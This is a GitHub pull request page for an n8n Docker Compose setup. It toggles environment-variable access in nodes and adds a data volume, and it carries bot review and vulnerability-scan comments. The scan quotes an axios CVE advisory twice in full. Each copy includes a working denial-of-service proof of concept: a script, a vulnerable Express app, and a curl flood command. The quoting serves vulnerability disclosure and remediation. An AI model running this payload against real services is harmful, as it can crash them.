Skip to content

Conversation

@SashkoMarchuk
Copy link
Contributor

@SashkoMarchuk SashkoMarchuk commented Sep 17, 2025

Summary by CodeRabbit

  • New Features

    • Enabled persistent n8n data storage in production via a mounted volume.
    • Allowed environment variable access within n8n nodes by default to improve workflow flexibility.
  • Chores

    • Simplified environment configuration by removing an obsolete allowlist variable in production settings.
    • Updated default environment settings to align development and production behavior.

…to Docker Compose files

- Add N8N_BLOCK_ENV_ACCESS_IN_NODE=true to docker-compose.yml for enhanced security
- Add N8N_ENV_ACCESS_ALLOWED with ASSEMBLY_USER and ASSEMBLY_PASS to docker-compose.prod.yml
- Add ASSEMBLY_USER and ASSEMBLY_PASS environment variables to both compose files
…nodes

- Remove invalid N8N_ENV_ACCESS_ALLOWED configuration from docker-compose.prod.yml
- Set N8N_BLOCK_ENV_ACCESS_IN_NODE=false in docker-compose.yml to allow environment variable access in nodes
@SashkoMarchuk SashkoMarchuk self-assigned this Sep 17, 2025
@coderabbitai
Copy link

coderabbitai bot commented Sep 17, 2025

Walkthrough

Updated n8n configuration in Docker Compose files: removed N8N_ENV_ACCESS_ALLOWED from production, changed N8N_BLOCK_ENV_ACCESS_IN_NODE from true to false in default compose, and added a persistent volume mount n8n_data:/data/n8n in the production compose.

Changes

Cohort / File(s) Summary of Changes
n8n environment access policy
docker-compose.yml, docker-compose.prod.yml
docker-compose.yml: set N8N_BLOCK_ENV_ACCESS_IN_NODE=false and removed its explanatory comment. docker-compose.prod.yml: removed N8N_ENV_ACCESS_ALLOWED.
Production persistent storage
docker-compose.prod.yml
Added volumes for n8n service: n8n_data:/data/n8n.

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~10 minutes

Possibly related PRs

Suggested reviewers

  • killev
  • DenisChistyakov

Poem

Hop hop! I tweak the envs with care,
A volume burrowed here, persistent lair.
Blockers flipped, a toggle’s grace—
Containers hum in tidy space.
N8N nods, configs align,
Carrots committed, pipelines fine. 🥕🐇

Pre-merge checks and finishing touches

✅ Passed checks (3 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Title Check ✅ Passed The PR title "Feat/security env vars config" succinctly and accurately reflects the main changes in the diff, which focus on environment-variable security configuration (e.g., toggling N8N_BLOCK_ENV_ACCESS_IN_NODE and removing N8N_ENV_ACCESS_ALLOWED) and related docker-compose adjustments. It is concise, specific to the change, and aligned with the branch name and PR objectives. It is not vague or misleading.
Docstring Coverage ✅ Passed No functions found in the changes. Docstring coverage check skipped.
✨ Finishing touches
🧪 Generate unit tests
  • Create PR with unit tests
  • Post copyable unit tests in a comment
  • Commit unit tests in branch feat/security-env-vars-config

Tip

👮 Agentic pre-merge checks are now available in preview!

Pro plan users can now enable pre-merge checks in their settings to enforce checklists before merging PRs.

  • Built-in checks – Quickly apply ready-made checks to enforce title conventions, require pull request descriptions that follow templates, validate linked issues for compliance, and more.
  • Custom agentic checks – Define your own rules using CodeRabbit’s advanced agentic capabilities to enforce organization-specific policies and workflows. For example, you can instruct CodeRabbit’s agent to verify that API documentation is updated whenever API schema files are modified in a PR. Note: Upto 5 custom checks are currently allowed during the preview period. Pricing for this feature will be announced in a few weeks.

Please see the documentation for more information.

Example:

reviews:
  pre_merge_checks:
    custom_checks:
      - name: "Undocumented Breaking Changes"
        mode: "warning"
        instructions: |
          Pass/fail criteria: All breaking changes to public APIs, CLI flags, environment variables, configuration keys, database schemas, or HTTP/GraphQL endpoints must be documented in the "Breaking Change" section of the PR description and in CHANGELOG.md. Exclude purely internal or private changes (e.g., code not exported from package entry points or explicitly marked as internal).

Please share your feedback with us on this Discord post.


Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

…ironment configuration

- Updated the npm install command to install packages directly into n8n's app directory, enhancing organization and ownership management.
- Replaced N8N_EXTERNAL_MODULES_ALLOWLIST with NODE_FUNCTION_ALLOW_EXTERNAL for better clarity in external module configuration.

These changes streamline the Docker build process and improve the overall setup for the n8n service.
@sonarqubecloud
Copy link

@github-actions
Copy link

github-actions bot commented Sep 17, 2025

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference n8n-test:latest
digestsha256:0d42ca4f40c825d9c5ce19ae7695967036c86e6ed58db88609d4547f1f22c145
vulnerabilitiescritical: 0 high: 3 medium: 0 low: 0
platformlinux/amd64
size335 MB
packages1844
📦 Base Image node:22-alpine
also known as
  • 22-alpine3.22
  • 22.19-alpine
  • 22.19-alpine3.22
  • 22.19.0-alpine
  • 22.19.0-alpine3.22
  • jod-alpine
  • jod-alpine3.22
  • lts-alpine
  • lts-alpine3.22
digestsha256:704b199e36b5c1bc505da773f742299dc1ee5a4c70b86d1eb406c334f63253c6
vulnerabilitiescritical: 0 high: 0 medium: 0 low: 2
critical: 0 high: 1 medium: 0 low: 0 axios 1.8.3 (npm)

pkg:npm/axios@1.8.3

high 7.5: CVE--2025--58754 Allocation of Resources Without Limits or Throttling

Affected range<1.12.0
Fixed version1.12.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.013%
EPSS Percentile1st percentile
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send 3 post requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.

critical: 0 high: 1 medium: 0 low: 0 axios 1.11.0 (npm)

pkg:npm/axios@1.11.0

high 7.5: CVE--2025--58754 Allocation of Resources Without Limits or Throttling

Affected range<1.12.0
Fixed version1.12.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.013%
EPSS Percentile1st percentile
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send 3 post requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.

critical: 0 high: 1 medium: 0 low: 0 openssh 10.0_p1-r7 (apk)

pkg:apk/alpine/openssh@10.0_p1-r7?os_name=alpine&os_version=3.22

high : CVE--2023--51767

Affected range<=10.0_p1-r7
Fixed versionNot Fixed
EPSS Score0.012%
EPSS Percentile1st percentile
Description

Copy link

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 3

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)
docker-compose.prod.yml (1)

7-15: Harden prod: explicitly block env access in nodes.

Because docker-compose.yml doesn’t override this in prod, env access would remain allowed after merge. Set it to true here. (docs.n8n.io)

       - N8N_SMTP_TLS=${N8N_SMTP_TLS:-true}
+      - N8N_BLOCK_ENV_ACCESS_IN_NODE=true

Also applies to: 21-25, 27-28

🧹 Nitpick comments (1)
docker-compose.prod.yml (1)

112-119: Align volume persistence with repo standards.

Bind the n8n_data volume to a local ./volumes/n8n_data directory (tracked/backed up consistently with other services), instead of a host-absolute /data/n8n path. [Policy: volumes/**/* should live under ./volumes/]

 volumes:
   n8n_data:
-    driver: local
-    driver_opts:
-      type: none
-      o: bind
-      device: /data/n8n
+    driver: local
+    driver_opts:
+      type: none
+      o: bind
+      device: ./volumes/n8n_data
📜 Review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between f86b525 and e5d08eb.

📒 Files selected for processing (2)
  • docker-compose.prod.yml (1 hunks)
  • docker-compose.yml (1 hunks)
🧰 Additional context used
📓 Path-based instructions (1)
docker-compose.yml

📄 CodeRabbit inference engine (.cursor/rules/docker-configuration.mdc)

docker-compose.yml: All service configurations, including service dependencies, volume mounts, network configuration, environment variables, and port mappings, must be defined in docker-compose.yml
Services must communicate over an internal Docker network with only the specified ports exposed: n8n (5678), Temporal (7233), Temporal UI (8080), PostgreSQL (5432), and OpenSearch (9200)

The repository must include a docker-compose.yml file as the main service orchestration configuration.

Use docker compose up -d to start all services

Files:

  • docker-compose.yml
🧠 Learnings (2)
📓 Common learnings
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/project-structure.mdc:0-0
Timestamp: 2025-07-28T16:44:50.073Z
Learning: Applies to Dockerfile.n8n : Use Dockerfile.n8n for custom n8n image configuration.
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/docker-configuration.mdc:0-0
Timestamp: 2025-07-28T16:44:24.081Z
Learning: Applies to docker-compose.yml : Services must communicate over an internal Docker network with only the specified ports exposed: n8n (5678), Temporal (7233), Temporal UI (8080), PostgreSQL (5432), and OpenSearch (9200)
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/docker-configuration.mdc:0-0
Timestamp: 2025-07-28T16:44:24.081Z
Learning: Applies to volumes/**/* : All service data must be persisted in Docker volumes mapped to the local volumes/ directory, such as ./volumes/n8n_data, ./volumes/opensearch-data, and ./volumes/postgresql-data
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/project-structure.mdc:0-0
Timestamp: 2025-07-28T16:44:50.073Z
Learning: Applies to volumes/{n8n_data,opensearch-data,postgresql-data}/ : Persistent data for all services must be stored in the volumes/ directory, with subdirectories for n8n_data, opensearch-data, and postgresql-data.
📚 Learning: 2025-07-28T16:44:24.081Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/docker-configuration.mdc:0-0
Timestamp: 2025-07-28T16:44:24.081Z
Learning: Applies to docker-compose.yml : Services must communicate over an internal Docker network with only the specified ports exposed: n8n (5678), Temporal (7233), Temporal UI (8080), PostgreSQL (5432), and OpenSearch (9200)

Applied to files:

  • docker-compose.prod.yml
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check

@SashkoMarchuk SashkoMarchuk merged commit f98c1f0 into main Sep 17, 2025
12 checks passed
@SashkoMarchuk SashkoMarchuk deleted the feat/security-env-vars-config branch September 17, 2025 21:02
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants